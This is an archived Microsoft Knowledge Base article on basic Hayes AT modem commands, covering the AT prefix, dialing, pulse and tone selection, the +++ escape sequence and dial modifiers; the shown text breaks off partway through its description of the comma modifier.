fmt.Fprintf(os.Stderr, "jpeg:%v\n", err) os.Exit(1) } } func toJPEG(in io.Reader, out io.Reader) error { img, kind, err := image.Decode(in) if err != { return err } fmt.Fprintln(os.Stderr,"Input format =",kind) return jpeg.Encode(out,img,&jpeg.Options{Quality: 95}) } If we give it an appropriate input, it can be successfully converted to output $ go build gopl.io/ch3/mandelbrot $ go build gopl.io/ch10/jpeg $ ./mandelbrot | ./jpeg >mandelbrot.jpg Input format = png If there is no anonymous import, it can compile, but it will not output correctly $ go build gopl.io/ch10/jpeg $ ./mandelbrot | ./jpeg >mandelbrot.jpg jpeg: image: unknown format Here is how the code works package png // image/png func Decode(r io.Reader) (image.Image, error) func DecodeConfig(r io.Reader) (image.Config, error) func init() { const pngHeader = "\x89PNG\r\n\x1a\n" image.RegisterFormat("png", pngHeader, Decode, DecodeConfig) } The final effect is that the main program only needs to anonymously import a specific image driver package to use image Decode decodes the image in the corresponding format The database package database/sql also adopts a similar technology, so that users can choose to import database drivers according to their needs, such as: import ( "database/sql" _ "github.com/lib/pq" // enable support for Postgres _ "github.com/go-sql-driver/mysql" // enable support for MySQL ) db, err = sql.Open("postgres", dbname) // OK db, err = sql.Open("mysql", dbname) // OK db, err = sql.Open("sqlite3", dbname) // returns error: unknown driver "sqlite3" 10.6 package and naming When creating a package, it is generally named with a short name; Try not to use the name of local variable; It is generally singular, but it can also be plural with other considerations When designing package names, you need to consider how package names and members work together, as shown in the following example: bytes.Equal flag.Int hettp.Get json.Marshal Let's look at the naming pattern of strings. Strings provides various operations on strings package strings func Index(needle, haystack string) int type Replacer struct{ /* ... */ } func NewReplacer(oldnew ...string) *Replacer type Reader struct{ /* ... */ } func NewReader(s string) *Reader strings. Index \ strings. Replacement and so on are all operations Other packages may only describe a single data type, such as html/template and math/rand. They only expose a main data structure and its related methods, and a function named New is used to create an instance package rand // "math/rand" type Rand struct{ /* ... */ } func New(source Source) *Rand It may also lead to repetition of some names, such as template Template or Rand Rand, which is one of the reasons why these kinds of package names are often very short At the other extreme, there are many names and few types of data types like the net/http package, because they have to perform a complex task. Although there are nearly 20 types and more functions, the names of the most important members in the package are simple and clear: Get, Post, Handle, Error, Client and Server
https://programmer.ink/think/go-language-bible-chapter-10-packages-and-tools-10.1-10.7.html
CC-MAIN-2022-21
refinedweb
1,174
50.87
by Charlie Greenbacker @greenbacker presentation will cover a handful of the NLP building blocks provided by NLTK (and a few additional libraries), including extracting text from HTML, stemming & lemmatization, frequency analysis, and named entity recognition. Several of these components will then be assembled to build a very basic document summarization program. Obviously, you'll need Python installed on your system to run the code examples used in this presentation. We enthusiatically recommend using Anaconda, a Python distribution provided by Continuum Analytics. Anaconda is free to use, it includes nearly 200 of the most commonly used Python packages for data analysis (including NLTK), and it works on Mac, Linux, and yes, even Windows. We'll make use of the following Python packages in the example code: Please note that the readability package is not distributed with Anaconda, so you'll need to download & install it separately using something like easy_install readability-lxml or pip install readability-lxml. If you don't use Anaconda, you'll also need to download & install the other packages separately using similar methods. Refer to the homepage of each package for instructions. You'll want to run nltk.download() one time to get all of the NLTK packages, corpora, etc. (see below). Select the "all" option. Depending on your network speed, this could take a while, but you'll only need to do it once. One of the examples will use NLTK's interface to the Stanford Named Entity Recognizer, which is distributed as a Java library. In particular, you'll want the following files handy in order to run this particular example: The first thing we'll need to do is import nltk: import nltk The first time you run anything using NLTK, you'll want to go ahead and download the additional resources that aren't distributed directly with the NLTK package. Upon running the nltk.download() command below, the the NLTK Downloader window will pop-up. In the Collections tab, select "all" and click on Download. As mentioned earlier, this may take several minutes depending on your network connection speed, but you'll only ever need to run it a single time. nltk.download() Now the fun begins. We'll start with a pretty basic and commonly-faced task: extracting text content from an HTML page. Python's urllib package gives us the tools we need to fetch a web page from a given URL, but we see that the output is full of HTML markup that we don't want to deal with. (N.B.: Throughout the examples in this presentation, we'll use Python slicing (e.g., [:500] below) to only display a small portion of a string or list. Otherwise, if we displayed the entire item, sometimes it would take up the entire screen.) from urllib import urlopen url = "" html = urlopen(url).read() html[:500] Fortunately, NTLK provides a method called clean_html() to get the raw text out of an HTML-formatted string. It's still not perfect, though, since the output will contain page navigation and all kinds of other junk that we don't want, especially if our goal is to focus on the body content from a news article, for example. text = nltk.clean_html(html) text[:500] If we just want the body content from the article, we'll need to use two additional packages. The first is a Python port of a Ruby port of a Javascript tool called Readability, which pulls the main body content out of an HTML document and subsequently "cleans it up." The second package, BeautifulSoup, is a Python library for pulling data out of HTML and XML files. It parses HTML content into easily-navigable nested data structure. Using Readability and BeautifulSoup together, we can quickly get exactly the text we're looking for out of the HTML, (mostly) free of page navigation, comments, ads, etc. Now we're ready to start analyzing this text content. from readability.readability import Document from bs4 import BeautifulSoup readable_article = Document(html).summary() readable_title = Document(html).title() soup = BeautifulSoup(readable_article) print '*** TITLE *** \n\"' + readable_title + '\"\n' print '*** CONTENT *** \n\"' + soup.text[:500] + '[...]\"' Here's a little secret: much of NLP (and data science, for that matter) boils down to counting things. If you've got a bunch of data that needs analyzin' but you don't know where to start, counting things is usually a good place to begin. Sure, you'll need to figure out exactly what you want to count, how to count it, and what to do with the counts, but if you're lost and don't know what to do, just start counting. Perhaps we'd like to begin (as is often the case in NLP) by examining the words that appear in our document. To do that, we'll first need to tokenize the text string into discrete words. Since we're working with English, this isn't so bad, but if we were working with a non-whitespace-delimited language like Chinese, Japanese, or Korean, it would be much more difficult. In the code snippet below, we're using two of NLTK's tokenize methods to first chop up the article text into sentences, and then each sentence into individual words. (Technically, we didn't need to use sent_tokenize(), but if we only used word_tokenize() alone, we'd see a bunch of extraneous sentence-final punctuation in our output.) By printing each token alphabetically, along with a count of the number of times it appeared in the text, we can see the results of the tokenization. Notice that the output contains some punctuation & numbers, hasn't been loweredcased, and counts BuzzFeed and BuzzFeed's separately. We'll tackle some of those issues next. tokens = [word for sent in nltk.sent_tokenize(soup.text) for word in nltk.word_tokenize(sent)] for token in sorted(set(tokens))[:30]: print token + ' [' + str(tokens.count(token)) + ']' Stemming is the process of reducing a word to its base/stem/root form. Most stemmers are pretty basic and just chop off standard affixes indicating things like tense (e.g., "-ed") and possessive forms (e.g., "-'s"). Here, we'll use the Snowball stemmer for English, which comes with NLTK. Once our tokens are stemmed, we can rest easy knowing that BuzzFeed and BuzzFeed's are now being counted together as... buzzfe? Don't worry: although this may look weird, it's pretty standard behavior for stemmers and won't affect our analysis (much). We also (probably) won't show the stemmed words to users -- we'll normally just use them for internal analysis or indexing purposes. from nltk.stem.snowball import SnowballStemmer stemmer = SnowballStemmer("english") stemmed_tokens = [stemmer.stem(t) for t in tokens] for token in sorted(set(stemmed_tokens))[50:75]: print token + ' [' + str(stemmed_tokens.count(token)) + ']' Although the stemmer very helpfully chopped off pesky affixes (and made everything lowercase to boot), there are some word forms that give stemmers indigestion, especially irregular words. While the process of stemming typically involves rule-based methods of stripping affixes (making them small & fast), lemmatization involves dictionary-based methods to derive the canonical forms (i.e., lemmas) of words. For example, run, runs, ran, and running all correspond to the lemma run. However, lemmatizers are generally big, slow, and brittle due to the nature of the dictionary-based methods, so you'll only want to use them when necessary. The example below compares the output of the Snowball stemmer with the WordNet lemmatizer (also distributed with NLTK). Notice that the lemmatizer correctly converts women into woman, while the stemmer turns lying into lie. Additionally, both replace eyes with eye, but neither of them properly transforms told into tell. lemmatizer = nltk.WordNetLemmatizer() temp_sent = "Several women told me I have lying eyes." print [stemmer.stem(t) for t in nltk.word_tokenize(temp_sent)] print [lemmatizer.lemmatize(t) for t in nltk.word_tokenize(temp_sent)] Thus far, we've been working with lists of tokens that we're manually sorting, uniquifying, and counting -- all of which can get to be a bit cumbersome. Fortunately, NLTK provides a data structure called FreqDist that makes it more convenient to work with these kinds of frequency distributions. The code snippet below builds a FreqDist from our list of stemmed tokens, and then displays the top 25 tokens appearing most frequently in the text of our article. Wasn't that easy? fdist = nltk.FreqDist(stemmed_tokens) for item in fdist.items()[:25]: print item Notice in the output above that most of the top 25 tokens are worthless. With the exception of things like facebook, content, user, and perhaps emot (emotion?), the rest are basically devoid of meaningful information. They don't really tells us anything about the article since these tokens will appear is just about any English document. What we need to do is filter out these stop words in order to focus on just the important material. While there is no single, definitive list of stop words, NLTK provides a decent start. Let's load it up and take a look at what we get: sorted(nltk.corpus.stopwords.words('english'))[:25] Now we can use this list to filter-out stop words from our list of stemmed tokens before we create the frequency distribution. You'll notice in the output below that we still have some things like punctuation that we'd probably like to remove, but we're much closer to having a list of the most "important" words in our article. stemmed_tokens_no_stop = [stemmer.stem(t) for t in stemmed_tokens if t not in nltk.corpus.stopwords.words('english')] fdist2 = nltk.FreqDist(stemmed_tokens_no_stop) for item in fdist2.items()[:25]: print item Another task we might want to do to help identify what's "important" in a text document is named entity recogniton (NER). Also called entity extraction, this process involves automatically extracting the names of persons, places, organizations, and potentially other entity types out of unstructured text. Building an NER classifier requires lots of annotated training data and some fancy machine learning algorithms, but fortunately, NLTK comes with a pre-built/pre-trained NER classifier ready to extract entities right out of the box. This classifier has been trained to recognize PERSON, ORGANIZATION, and GPE (geo-political entity) entity types. (At this point, I should include a disclaimer stating No True Computational Linguist would ever use a pre-built NER classifier in the "real world" without first re-training it on annotated data representing their particular task. So please don't send me any hate mail -- I've done my part to stop the madness.) In the example below (inspired by this gist from Gavin Hackeling and this post from John Price), we're defining a method to perform the following steps: nltk.pos_tag() nltk.ne_chunk() We then apply this method to a sample sentence and parse the clunky output format provided by nltk.ne_chunk() (it comes as a nltk.tree.Tree) to display the entities we've extracted. Don't let these nice results fool you -- NER output isn't always this satisfying. Try some other sample text and see what you get. def extract_entities(text): entities = [] for sentence in nltk.sent_tokenize(text): chunks = nltk.ne_chunk(nltk.pos_tag(nltk.word_tokenize(sentence))) entities.extend([chunk for chunk in chunks if hasattr(chunk, 'node')]) return entities for entity in extract_entities('My name is Charlie and I work for Altamira in Tysons Corner.'): print '[' + entity.node + '] ' + ' '.join(c[0] for c in entity.leaves()) If you're like me, you've grown accustomed over the years to working with the Stanford NER library for Java, and you're suspicious of NLTK's built-in NER classifier (especially because it has chunk in the name). Thankfully, recent versions of NLTK contain an special NERTagger interface that enables us to make calls to Stanford NER from our Python programs, even though Stanford NER is a Java library (the horror!). Not surprisingly, the Python NERTagger API is slightly less verbose than the native Java API for Stanford NER. To run this example, you'll need to follow the instructions for installing the optional Java libraries, as outlined in the Initial Setup section above. You'll also want to pay close attention to the comment that says # change the paths below to point to wherever you unzipped the Stanford NER download file. from nltk.tag.stanford import NERTagger # change the paths below to point to wherever you unzipped the Stanford NER download file st = NERTagger('/Users/cgreenba/stanford-ner/classifiers/english.all.3class.distsim.crf.ser.gz', '/Users/cgreenba/stanford-ner/stanford-ner.jar', 'utf-8') for i in st.tag('Up next is Tommy, who works at STPI in Washington.'.split()): print '[' + i[1] + '] ' + i[0] Now let's try to take some of what we've learned and build something potentially useful in real life: a program that will automatically summarize documents. For this, we'll switch gears slightly, putting aside the web article we've been working on until now and instead using a corpus of documents distributed with NLTK. The Reuters Corpus contains nearly 11,000 news articles about a variety of topics and subjects. If you've run the nltk.download() command as previously recommended, you can then easily import and explore the Reuters Corpus like so: from nltk.corpus import reuters print '** BEGIN ARTICLE: ** \"' + reuters.raw(reuters.fileids()[0])[:500] + ' [...]\"' Our painfully simplistic automatic summarization tool will implement the following steps: Sounds easy enough, right? But before we can say "voila!," we'll need to figure out how to calculate an "importance" score for words. As we saw above with stop words, etc. simply counting the number of times a word appears in a document will not necessarily tell you which words are most important. Consider a document that contains the word baseball 8 times. You might think, "wow, baseball isn't a stop word, and it appeared rather frequently here, so it's probably important." And you might be right. But what if that document is actually an article posted on a baseball blog? Won't the word baseball appear frequently in nearly every post on that blog? In this particular case, if you were generating a summary of this document, would the word baseball be a good indicator of importance, or would you maybe look for other words that help distinguish or differentiate this blog post from the rest? Context is essential. What really matters here isn't the raw frequency of the number of times each word appeared in a document, but rather the relative frequency comparing the number of times a word appeared in this document against the number of times it appeared across the rest of the collection of documents. "Important" words will be the ones that are generally rare across the collection, but which appear with an unusually high frequency in a given document. We'll calculate this relative frequency using a statistical metric called term frequency - inverse document frequency (TF-IDF). We could implement TF-IDF ourselves using NLTK, but rather than bore you with the math, we'll take a shortcut and use the TF-IDF implementation provided by the scikit-learn machine learning library for Python. We'll use scikit-learn's TfidfVectorizer class to construct a term-document matrix containing the TF-IDF score for each word in each document in the Reuters Corpus. In essence, the rows of this sparse matrix correspond to documents in the corpus, the columns represent each word in the vocabulary of the corpus, and each cell contains the TF-IDF value for a given word in a given document. Inspired by a computer science lab exercise from Duke University, the code sample below iterates through the Reuters Corpus to build a dictionary of stemmed tokens for each article, then uses the TfidfVectorizer and scikit-learn's own built-in stop words list to generate the term-document matrix containing TF-IDF scores. import datetime, re, sys from sklearn.feature_extraction.text import TfidfVectorizer def tokenize_and_stem(text): token_dict = {} for article in reuters.fileids(): token_dict[article] = reuters.raw(article) tfidf = TfidfVectorizer(tokenizer=tokenize_and_stem, stop_words='english', decode_error='ignore') print 'building term-document matrix... [process started: ' + str(datetime.datetime.now()) + ']' sys.stdout.flush() tdm = tfidf.fit_transform(token_dict.values()) # this can take some time (about 60 seconds on my machine) print 'done! [process finished: ' + str(datetime.datetime.now()) + ']' from random import randint feature_names = tfidf.get_feature_names() print 'TDM contains ' + str(len(feature_names)) + ' terms and ' + str(tdm.shape[0]) + ' documents' print 'first term: ' + feature_names[0] print 'last term: ' + feature_names[len(feature_names) - 1] for i in range(0, 4): print 'random term: ' + feature_names[randint(1,len(feature_names) - 2)] That's all we'll need to produce a summary for any document in the corpus. In the example code below, we start by randomly selecting an article from the Reuters Corpus. We iterate through the article, calculating a score for each sentence by summing the TF-IDF values for each word appearing in the sentence. We normalize the sentence scores by dividing by the number of tokens in the sentence (to avoid bias in favor of longer sentences). Then we sort the sentences by their scores, and return the highest-scoring sentences as our summary. The number of sentences returned corresponds to roughly 20% of the overall length of the article. Since some of the articles in the Reuters Corpus are rather small (i.e., a single sentence in length) or contain just raw financial data, some of the summaries won't make sense. If you run this code a few times, however, you'll eventually see a randomly-selected article that provides a decent demonstration of this simplistic method of identifying the "most important" sentence from a document. import math from __future__ import division article_id = randint(0, tdm.shape[0] - 1) article_text = reuters.raw(reuters.fileids()[article_id]) sent_scores = [] for sentence in nltk.sent_tokenize(article_text): score = 0 sent_tokens = tokenize_and_stem(sentence) for token in (t for t in sent_tokens if t in feature_names): score += tdm[article_id, feature_names.index(token)] sent_scores.append((score / len(sent_tokens), sentence)) summary_length = int(math.ceil(len(sent_scores) / 5)) sent_scores.sort(key=lambda sent: sent[0], reverse=True) print '*** SUMMARY ***' for summary_sentence in sent_scores[:summary_length]: print summary_sentence[1] print '\n*** ORIGINAL ***' print article_text That was fairly easy, but how could we improve the quality of the generated summary? Perhaps we could boost the importance of words found in the title or any entities we're able to extract from the text. After initially selecting the highest-scoring sentence, we might discount the TF-IDF scores for duplicate words in the remaining sentences in an attempt to reduce repetitiveness. We could also look at cleaning up the sentences used to form the summary by fixing any pronouns missing an antecedent, or even pulling out partial phrases instead of complete sentences. The possibilities are virtually endless. Want to learn more? Start by working your way through all the examples in the NLTK book (aka "the Whale book"):
https://nbviewer.ipython.org/github/charlieg/A-Smattering-of-NLP-in-Python/blob/master/A%20Smattering%20of%20NLP%20in%20Python.ipynb
CC-MAIN-2021-43
refinedweb
3,158
54.42
I complex View with UserControls that need to be updated. The easiest way of doing so, as I see it so far, is by using message mediation service as MVVM Light Messenger. However in this case I will need to have some handling code in my View, w f We can increase the number of view session in JSF through specify a larger number of numberOfViewsInSession and numberOfLogicalViews in web.xml. However, we have faced a difficult problem under multiple browser tabs situation. When user open multiple Following is my controller class, namespace Admin; class CategoriesController extends \BaseController { public function index($action = '', $id= ''){ //return \View::make('welcome');View is correctly rendered here switch ($action){ case '' : case 'li I have created the following on which in can perform query with out where clause clause but when I use the following query: select * from teacherSub where teacher = "te123"; it generates an error: Msg 207, Level 16, State 1, Line 2 Full code: US I am looping over collection of Person in scala view in PlayFramework2.2.6. Person class is superclass for classes User,Contact. While looping I would like to access some parameters specified for extending classes like email attribute in User class. I am busy building a tagging system in RoR. This system I've coded according to: Now when I print out tag.name it works but I also get what looks like the entire tag_list as an objec I have developed rails app with three classes. class Location < ActiveRecord::Base has_many :observations end class Observation < ActiveRecord::Base belongs_to :location has_one :rainfall has_one :temperature has_one :winddirection has_one :windspee Can anyone help me? I'm in need of displaying 2 tables on one page. Those 2 tables are actually shopping cart info, but holds different content type. is the link of an image how the page should be seen. --------------Solutions------------- You could In my mvc application: @using (Html.BeginForm()) { @Html.DropDownList("ddllanguage", Model.Language, new {@ } <h4>@MyHelper.Translate("Welcome","EN")</h4> On button sub im trying to get from my DB, the levels from a users, and print them in a view, but i cant do it. Controller: public function add_notificacion() { $data = array(); if (!empty($this->input->post('mensaje', TRUE))) { if (($this->input->post I have a feature in my project called calendar. Users are able to add 'Events' and 'Event Types' When a user clicks on 'Add New Event', he or she is redirected to the 'Add New Event' page. Inside the page contains a dropdown field 'Event Type'. There I want to create my own login page uses the e-mail address and password in django 1.7. When complete box and I click "login" page back to the login page. My view: def get_user_by_email(email): try: return User.objects.get(email=email) except User.Doe I have a question about how this works, currently Im away from college and theres no way I can ask my professor about this question, hopefully you guys can help me out. So, I've got a login panel made in xaml (The password thing has a class because o I would like to create a view of multiple tables but no joins: SELECT * Table1, Table2, Table 3 But the Server is changing this to: Select * Table1 CROSSJOIN Table2 CROSSJOIN Table3 Is this not possible? I have 4 tables... Products, Forms, Specificat I have several data tables / Entities (APRICOT BANANA, LEMON) in the same EDMX and each table has multiple columns (Name, Quantity, Date, Sort) In a view, I have a drop-down list (DropDownList) which contains ("A", "B" and "C") What I want to do: In I am trying to programmatically create a gray Rect and black Rect with BlurMaskFilter layer (drop shadow effect) by overriding onDraw in a custom View. I am able to get it to draw on screen without any issues, but when I try to draw the view to a bit Here is my entity class to map a view of database, postgresql. view is created with the same query as with @subselect script is : create view meeting_result as SELECT id, subject, from_time, to_time, host, created_by, asst_host, status, CASE WHEN fro
http://www.pcaskme.com/tag/view/
CC-MAIN-2019-04
refinedweb
694
58.42
CodePlexProject Hosting for Open Source Software I followed a bunch of examples, the documentation, and read the forums. I have an extremely simple rule that will not load into the settings. There is no logging so I cannot discover the quiet error. Everything is named InstanceVariablesUnderscorePrefix.something. The target build platform is 3.5. Without any error message, I have no idea where to go next. The following code was shamelessly stolen from somebody else's example online. using Microsoft.StyleCop; using Microsoft.StyleCop.CSharp; /// <summary> /// This StyleCop Rule makes sure that instance variables are prefixed with an underscore. /// </summary> [SourceAnalyzer(typeof(CsParser))] public class InstanceVariablesUnderscorePrefix : SourceAnalyzer { public InstanceVariablesUnderscorePrefix() { } public override void AnalyzeDocument(CodeDocument document) { CsDocument csdocument = (CsDocument)document; if (csdocument.RootElement != null && !csdocument.RootElement.Generated) csdocument.WalkDocument(new CodeWalkerElementVisitor<object>(this.VisitElement), null, null); } private bool VisitElement(CsElement element, CsElement parentElement, object context) { // Flag a violation if the instance variables are not prefixed with an underscore. if (!element.Generated && element.ElementType == ElementType.Field && element.ActualAccess != AccessModifierType.Public && element.ActualAccess != AccessModifierType.Internal && element.Declaration.Name.ToCharArray()[0] != '_') { AddViolation(element, "InstanceVariablesUnderscorePrefix"); } return true; } } <?xml version="1.0" encoding="utf-8" ?> <SourceAnalyzer Name="Extensions"> <Description> These custom rules provide extensions to the ones provided with StyleCop. </Description> <Rules> <RuleGroup Name="Formatting Rules"> <Rule Name="InstanceVariablesUnderscorePrefix" CheckId="EX1001"> <Context>Instance variables should be prefixed by underscore.</Context> <Description>Instance variables are easier to distinguish when prefixed with an underscore.</Description> </Rule> </RuleGroup> </Rules> </SourceAnalyzer> Thanks! Hi, With the fear to seem annoying I will recommend you taking look at It allows a great flexibility in naming rules (and supports the rule you mentioned as well). Considering your very example I could try to help you a bit later (in 2 weeks), if you still be insterested. Best regards, Oleg Shuruev I downloaded it and have it installed. Nice. Seems to work reasonably well for a beta. :-) It has all the additional rules that I need to adjust for my company's style rules. Thanks for the pointer! Hi again, As promised, I can give you little help now. If you really want to learn making your own rules, just e-mail (or share in any other way) me your entire project (csproj file among with others). I will inspect this and tell you the exact reason why it doesn't work. Best regards, Oleg Shuruev Thanks, but your stylecop+ works for every single change that I needed to have so I don't need to bother with getting my code to work. If I do need the help later, I'll ask again. Thank you! --Sean Hi there! I am also encountering problem on installing stylecop custom rule i created. It seems that Settings.StyleCop does not load the the custom rule. I've followed all the solutions presented in codeplex forums and others as well but still, it doesn't work. Can you help me out with this? Thanks a lot. spongebob21 wrote: Can you help me out with this? Sure, Just e-mail me your entire project (as I wrote above). Where are you putting your dll? Try putting it next to the built-in rule dll. /Bo @BoLund: I've already place it next to the built-in rule at C:\Program Files\Microsoft StyleCop 4.4.0.14, but still it doesn't work.. @shuruev: Ok, i'll send you the project. I've reviewed your project very attentively and technically it's OK. It can be successfully loaded as add-in and displayed in settings window. I even tried how your rule works and it is quite workable too (at least it performs what you ask it to perform). So it would be nice if you specify in more details what your problem is. For example, if you try the following: - take StyleCopCustomRule.dll from your bin folder (from the archive you sent) - place it to C:\Program Files\Microsoft StyleCop 4.4.0.14 - drag & drop Settings.StyleCop to StyleCopSettingsEditor.exe you should see your rule displayed in the settings window. Could you please try it? The other thing I would like to pay your attention to, is to take a look at StyleCop+ (already mentioned above in this thread). It allows a great flexibility in naming rules (and supports the rule you are creating as well). At last it work! Thanks for the great help shuruev. Yeah you're right, my project is ok. The only reason why my custom rule is not being loaded is that I didn't drag and drop Settings.StyleCop to StyleCopSettingsEditor.exe instead I just double-click the Settings.StyleCop. Thanks again.. Ok, I'll try StyleCOp+ soon. By the way Shuruev, does stylecop reports supports stylesheet? if yes, how can i apply a stylesheet for the stylecop report that is being generated? As far as I understand, StyleCop can only create output XML file. It doesn't apply any XSLT to it, but it doesn't seem a big deal to do it by your own. Hi Shuruev, i have created a custom dll with the above mentioned Code (First Thread) But still i am not able to see the Rule in StyleCop.Setting . Pls. help. Shuruev, I did all steps explanied above, and my custom rule doesn't show in windows setting. Can you help me? Hi guys, Yes, I would like to help. As this question raised quite often, I have created simple step-by-step guide for custom StyleCop rules creation: Could you please check it out and give any feedback whether it was useful enough to solve your issues? Thanks a lot! @dsscaze: If you exactly follow the steps explained in the WIKI, you will succeed. Important is, that you double check the versions of StyleCop installed on your machine and the reference in your custom rules project must be exactly the same. Otherwise the extension just doesn't get loaded. The xml where you define your rules must also follow all the rules explained. I struggled also a lot in the beginning. If all of that doesn't help, try using Sysinternal's ProcessMonitor or Fusion Log (fslogvw from a VS command prompt). This might help identifying the problem. Good Luck Thomas Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://stylecop.codeplex.com/discussions/229220
CC-MAIN-2018-05
refinedweb
1,075
59.09
Post your Comment File Path compare in java File Path Comparison :compareTo File Path Comparison :compareTo In this section, we will discuss how to compare pathname of two file for the equality compare two strings in java compare two strings in java How to compare two strings in java? package Compare; public class StringTest { public static void main(String [] args){ String str="Roseindia"; String str1 Compare two word file Compare two word file How to compare two word file using Java Compare 2 files Compare 2 files I would like to compare 2 files in Java. please send... to compare these files and print the diffrence by comparing the report name... file 1 and 2. The file name will normally be the last 16 characters of a line How do I compare strings in Java? How do I compare strings in Java? How do I compare strings in Java java code to compare two hash map objects java code to compare two hash map objects java code to compare two hash map objects Java : String Compare Java : String Compare This tutorial demonstrate various way to compare two strings. String Compare : In java, you can compare strings in many ways. It has provide ==operator, equals method and compareTo method to compare path - Java Beginners meaning of path and classpath what is the meaning of path and classpath. How it is set in environment variable. Path and ClassPath in in JAVAJava ClassPath Resources:- how to compare 2 arrays using java? how to compare 2 arrays using java? hi can anyone give me the information regarding comparision of arrays. Java Compare Arrays path - Java Beginners path how to set the path in environment variables to run java programs in my pc? Hi friend, Read for more information. Compare string example Compare strings example In this section, you will learn how to compare two strings in java. The java lang package provides a method to compare two Class Path - Java Beginners Class Path Hello I was able to set the class path as You have......; there u can type the path both in user variables for administrator Hi...-->environment variables--> there u can type the path both in user variables set class path how to set class path how to set class path in java Compare two char array in java Description: This tutorial demonstrate how to compare two character array are equal or not. The Arrays.equals(c1, c2) helps to compare it and return boolean value. Code: import java.util.Arrays.  java program to compare two hashmaps and check whether they are equal or not java program to compare two hashmaps and check whether they are equal or not java program to compare two hashmaps and check whether they are equal Java IO Path Java IO Path In this section we will discuss about the Java IO Path. Storage... is called a Path of that file or folder using which they can be accessed easily... In the above file path the character ' \ ' is a directory separator also wt is the advantage of myeclipse ide compare to others wt is the advantage of myeclipse ide compare to others plz give me the reply Hi Friend, Advantages: 1)Extendable 2)Best CVS / SVN... platforms 5)Easy extensions to Java tooling 6)A portable and customizable No action instance for path ("")){ System.out.println("Server path:" +filePath); //Create file...; <head> <title>Struts File Upload and Save...; <font size="4">File Upload on Server</font> poi & class path - Java Beginners . Also after downloading how to set class path. Hi Friend, Download zip file from the following link:... of your jdk version.After this set the path in 'PATH' variable of Environment How Compare 2 xml files with JDOM - Java Beginners How Compare 2 xml files with JDOM Hi I'm want help on how can I compare 2 xml files using JDOM in java and identify whether have the same content or not My files can simply be File1 File2 Post your Comment
http://roseindia.net/discussion/29815-File-Path-compare-in-java.html
CC-MAIN-2015-22
refinedweb
667
67.89
Long running conversationGene Campbell Jan 21, 2008 7:18 PM I have this Seam POJO Action @Name("bean") @Scope(ScopeType.CONVERSATION) @Conversational public class BeanAction implements Serializable { @Begin(join=true) @Create public void create(){ log.debug("Starting Conversation id: "+ Conversation.instance().getId()+" long running?: "+Conversation.instance().isLongRunning()); } When I browse bean.xhtml (facelets/jfc), the log says Starting Conversation id: 1 long running?: false Why false, thought it should be true? And, when I submit a form on the page like this <h:commandButton <s:conversationPropagation </h:commandButton> I get an exception saying my bean isn't in the context. And it seems that the conversation isn't available, which would make sense if it truely isn't long running, right? I'm quite confused, so my message may be lacking information to totally make sense. If so, ask questions. javax.servlet.ServletException: /bean.xhtml @59,55 binding="#{bean.table}": Target Unreachable, identifier 'bean' resolved to null at javax.faces.webapp.FacesServlet.service(FacesServlet.java:256)) 1. Re: Long running conversationNicklas Karlsson Jan 22, 2008 2:22 AM (in response to Gene Campbell) It might be that the conversation is promoted to long-running later in the lifecycle (after the debug statement). Tried putting output on the view? But I can't really say why the "bean" isn't picked up. It should be there, since conversation=request if it's not long running. The @Conversational might complain, but the bean should still be found(?). 2. Re: Long running conversationPete Muir Jan 22, 2008 8:23 AM (in response to Gene Campbell) Why false, thought it should be true? The promotion to long running occurs after your method returns. Is the bean deployed at startup? 3. Re: Long running conversationGene Campbell Jan 22, 2008 4:34 PM (in response to Gene Campbell) "pete.muir@jboss.org" wrote: Is the bean deployed at startup? I believe so. In any case this was related to the JSF binding issues you pointed out in another thread. thanks for you responses and help!!
https://developer.jboss.org/message/494771
CC-MAIN-2019-09
refinedweb
339
51.55
: 3V0OrtKbc3f4xTn6.0 Using Basic AT Modem Commands Print This article was previously published under Q164659 This article has been archived. It is offered "as is" and will no longer be updated. SUMMARY NOTE: These are general modem commands. Certain commands may not work withall modems. Consult the documentation for your modem if you experiencedifficulties, or contact your modem manufacturer's technical supportdepartment. All commands except two must begin with the characters AT. The twoexceptions are the escape sequence (+++), and the repeat command (A/). Thecommand line prefix (letters AT), and the command sequences that follow,can be typed in uppercase or lowercase (used on older modems), butgenerally case must not be mixed. More than one command can be typed onone line; you may separate them by spaces for easier reading. The spacesare ignored by the modem's command interpreter but are included in thecharacter count on the input line. With most modems, the command linebuffer accepts up to 39 characters including the A and T characters.Spaces, carriage return, and any line feed characters do not go into thebuffer, and do not count against the 39 character limitation. Some modemshave line length limitations as low as 24 characters. Others may have alarger buffer. Refer to modem documentation for specifics about yourparticular modem. If more than 39 characters are entered, or a syntaxerror is found anywhere in the command line, the modem returns an ERRORresult code, and the command input is ignored. MORE INFORMATION Basic Commands With the following basic AT commands, you can make calls directly, selectthe dialing method (tone or pulse), control the speaker volume, andperform a number of other basic modem operations. IMPORTANT: You must be in the Command mode of your communication softwareto use the AT commands. Refer to the documentation that came with yourcommunications software for information on entering the Command mode. AT : This prefix begins all but two commands you issue to the modemlocally, and tells the modem ATtention! commands to follow. D Dial. Use the D command to dial a telephone number from the commandline.modem, you may need to return to command mode to adjust the modemconfiguration, or, more commonly, to hang up. To do this, leave yourkeyboard idle (press no keys) for at least one second, and then press theplus sign (+) three times. This is one of the two commands that do not usethe AT prefix, or a carriage return to enter. After a moment, the modemwill respond with OK indicating you have been returned to command mode. P : Pulse dialing. Also known as rotary dialing, this dial modifierfollows the D command and precedes the telephone number to tell the modemto dial the number using pulse service. For example, to dial the number123-4567 on a pulse phone line, type "ATDP 1234567". T : Tone dialing. This modifier selects the tone method of dialing usingDTMF tones. Note: Tone and pulse dialing can also be combined in a dialcommand line when both dialing methods are required. For example, to dialthe number 123-4567 on a touch-tone phone line, type "ATDT 1234567". Dial Command Modifiers Command modifiers define additional parameters to the modem that instructthe modem to perform certain functions automatically when dialing a phonenumber. They are only valid when they are contained in a dial string (thatfollows the D command). The commands that are used to accomplish this taskare called dial modifiers, and are placed in the dial string prior toissuing the command. Syntax: ATD{dial modifier} 1234567 [Enter] ; : Resume command mode after dialing. If you need to dial a number thatis too long to be contained in the command buffer (45 characters for the Dcommand), use the semicolon (;) modifier to separate the dial string intomultiple dial commands. All but the last command must end with the ;modifier. , : Pause While Dialing. The comma (,) dial modifier causes the modem topause while dialing. The modem will pause the number of seconds specifiedin S-Register S8 and then continue dialing. If a pause time longer thanthe value in S-Register S8, it can be increased by either inserting morethan one (,) in the dial command line or changing the value of S-RegisterS8. In the following example, the command accesses the outside (public)telephone line with the 9 dial modifier. Because the comma (,) dialmodifier is present, the modem 